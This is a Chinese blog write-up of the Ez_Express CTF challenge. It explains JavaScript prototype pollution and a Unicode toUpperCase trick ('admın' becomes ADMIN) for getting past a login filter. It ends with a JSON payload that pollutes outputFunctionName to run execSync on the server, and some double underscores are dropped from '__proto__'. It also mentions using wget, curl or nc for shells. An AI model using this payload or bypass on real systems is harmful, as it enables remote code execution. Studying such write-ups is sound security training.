[GYCTF2020]Ez_Express

最新推荐文章于 2022-10-06 18:31:42 发布
最新推荐文章于 2022-10-06 18:31:42 发布
阅读量2.1k 收藏 2
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63045593/article/details/124353044
版权

[GYCTF2020]Ez_Express

在这里插入图片描述

dirsearch 扫到源码 www.zip

首先回顾一下原型链污染

在我们调用一个对象的某属性时:

1.对象(obj)中寻找这一属性
2.如果找不到,则在obj.__proto__中寻找属性
3.如果仍然找不到,则继续在obj.__proto__.__proto__中寻找这一属性

以上机制被称为js的prototype继承链。而原型链污染就与这有关

原型链污染定义:

如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染

let foo ={bar:1}
console.log(foo.bar)
foo._proto__.bar=2
console.log(foo.bar)
let zoo={}
console.log(zoo.bar)
1
1

思路:js审计如果看见merge,clone函数,可以往原型链污染靠,跟进找一下关键的函数,找污染点

切记一定要让其__proto__解析为一个键名

byc师傅blog的总结:

总结下:
1.原型链污染属于前端漏洞应用,基本上需要源码审计功力来进行解决;找到merge(),clone()只是确定漏洞的开始
2.进行审计需要以达成RCE为主要目的。通常exec, return等等都是值得注意的关键字。
3.题目基本是以弹shell为最终目的。目前来看很多Node.js传统弹shell方式并不适用.wget,curl,以及我两道题都用到的nc比较适用。

首先审到的是index主界面的js

**merge()**合并两个数组,修改第一个参数的内容

**clone()**克隆所有的

元素,并插入到 元素的结尾:

router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});

路由 action 先判断是否为admin用户 如果是才会调用下面的clone

那就只能回到登录界面login路由处查看

if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }
    res.redirect('/'); 
  }

当参数中的Submit==register且密码 不正确时会对userid进行toUpperCase()

toUpperCase()是javascript中将小写转换成大写的函数。toLowerCase()是javascript中将大写转换成小写的函数。但是这俩函数真的只有这两个功能么?

在这里插入图片描述

其中混入了两个奇特的字符"ı"、“ſ”。

这两个字符的“大写”是I和S。也就是说"ı".toUpperCase() == ‘I’,“ſ”.toUpperCase() == ‘S’。通过这个小特性可以绕过一些限制。

同样,toLowerCase也有同样的字符:

在这里插入图片描述

这个"K"的“小写”字符是k,也就是"K".toLowerCase() == ‘k’.

也就是说admın进行大写转换后会使ADMIN

在这里插入图片描述

在这里插入图片描述

来到action界面想办法调用函数

注意到info界面中的outputFunctionName并未定义可以利用

在这里插入图片描述

也就是可以通过污染outputFunctionName进行SSTI

image-20220211171510176

看到action的数据包实通过参数lua发送数据

于是抓/action的包,Content-Type设为application/json(也就是数据包的形式)

这样可以利用原型链污染的特性使lua为空并设置_proto__完成shell

{“lua”:“a”,“proto”:{
“outputFunctionName”:“a=1;return global.process.mainModule.constructor._load(‘child_process’).execSync(‘cat /flag’)//”},
“Submit”:“”
}

最后进到info里面可以直接看到flag

!Tana
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ez_setup.py下载
05-16
ez_setup.py下载
Week小结
qq_61209261的博客
07-15 289
Web安全学习
BUU刷题(二)
your_friends的博客
10-06 200
看到在登陆路由里面如果我们提交了register她会判断你的userid如果里面含有大小写的admin就会弹窗禁言,但是登陆的action判断又必须得是大写的ADMIN。他将我们的输入clone到data中,所以这里我们如果污染这里的内容就可以了,那么污染哪个内容呢,我们继续跟进下面剩下的info路由。这里把我们输入的userid转换成大写了,而nodejs的大小写是有特性的,如果相像的字符通过转换之后可能会相同。看不明白了,所以查了一查,发现这里考的是C语言的预编译。
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 461
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
ez_setup.py
05-26
安装setuptools的脚本代码
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
2021-3-18_js原型链之_[GYCTF2020]Ez_Express
抒情诗
03-18 385
这题是第一次接触到的js原型链,学得太慢了 新手学习,不免有错漏。 js的原型链污染就是js在调用数组下标或者对象的属性的时候如果没有在自己这里发现相关的就会自动向上查找,emmm因为js中一切皆对象,一个对象的__proto__还是一个对象,对象.__proto__就叫做对象的原型?好像是这样。然后会一直向上查找知道找到Object的原型为null似乎是,然后他向上查找的这条链就叫做JavaScript的原型链。我们这里要用的原型链污染其实就是因为,如果JavaScript代码之中有一个东西没有经过定义并
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 1830
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
GYCTF2020_Writeup
Lethe's Blog
03-15 2486
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
[GYCTF2020]Ez_Express 原型链污染 js大小写特性
scrawman的博客
01-24 771
[GYCTF2020]Ez_Express 随便注册一个账号登录,查看源代码可以发现www.zip的提示 下载源码,找到index.js var express = require('express'); var router = express.Router(); const isObject = obj => obj && obj.constructor && obj.constructor === Object; const merge = (a, b) =&g
BUUCTF:[GYCTF2020]EasyThinking
末初的CSDN博客
03-28 3423
参考:https://www.cnblogs.com/yesec/p/12571861.html 目录扫描,存在源码泄露www.zip ThinkPHP框架 ThinPHPV6.0.0 漏洞成因:ThinkPHP6任意文件操作漏洞分析 session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位) 然后再search搜索的内容会直接保存在/ru...
BUUCTF:GYCTF2020/新春战疫Easyphp
末初的CSDN博客
03-29 3093
参考:https://blog.csdn.net/qq_42181428/article/details/104474414?fps=1&locationNum=2 新春战疫原题在BUU上的复现,反序列化配合字符逃逸 源码泄露www,zip PHP反序列化的字符逃逸的原理 PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 获取f...
ez_udp_connect
最新发布
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值